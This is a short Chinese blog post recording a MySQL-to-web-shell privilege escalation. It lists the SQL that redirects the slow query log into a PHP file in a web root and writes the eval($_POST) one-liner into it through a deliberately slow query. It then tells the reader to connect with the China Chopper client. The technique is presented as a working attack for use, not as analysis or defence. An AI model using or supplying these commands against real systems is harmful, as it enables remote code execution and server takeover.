当前位置：首页 > 大杂烩 > 正文内容

mysql提权记录,mysql日志提权

高老师4年前 (2021-01-19)大杂烩1572

成功提权，记录一下，具体执行sql:

set GLOBAL slow_query_log =1;
set GLOBAL long_query_time =1;
set GLOBAL slow_query_log_file = 'E:/phpStudy/WWW/25.php';
SELECT "<?php eval($_POST['a']);?>" or sleep(11);

原理：设置sql慢查询的秒数，执行超时会把sql保存为文件，我们把查询语句改为php代码即可，然后上菜刀即可。

扫描二维码推送至手机访问。

本文链接：https://blog.20230611.cn/post/593.html

分享给朋友：

返回列表

上一篇：为什么不推荐使用swoole和hyperf官方框架

下一篇：linux软连接和硬链接的区别,linux 软连接,linux 软连接命令,linux 硬连接,linux 硬连接命令

“mysql提权记录,mysql日志提权” 的相关文章

Application的错误使用

Application 对象用于存储和访问来自任意页面的变量，类似 Session 对象。不同之处在于所有的用户分享一个 Application 对象，而 session 对象和用户的关系是一一对应的。很多的书籍中介绍的Application对象都喜欢以统计在线人数来介绍Application 对象...

Git推送文件到远程仓库

1.远程仓库的协作模式开发者把自己最新的版本推到线上仓库,同时把线上仓库的最新代码,拉到自己本地即可2.注册git帐号国外: http://www.github.com国内: http://git.oschina.net2.在码云创建项目,不要初始化readmegit push https://gi...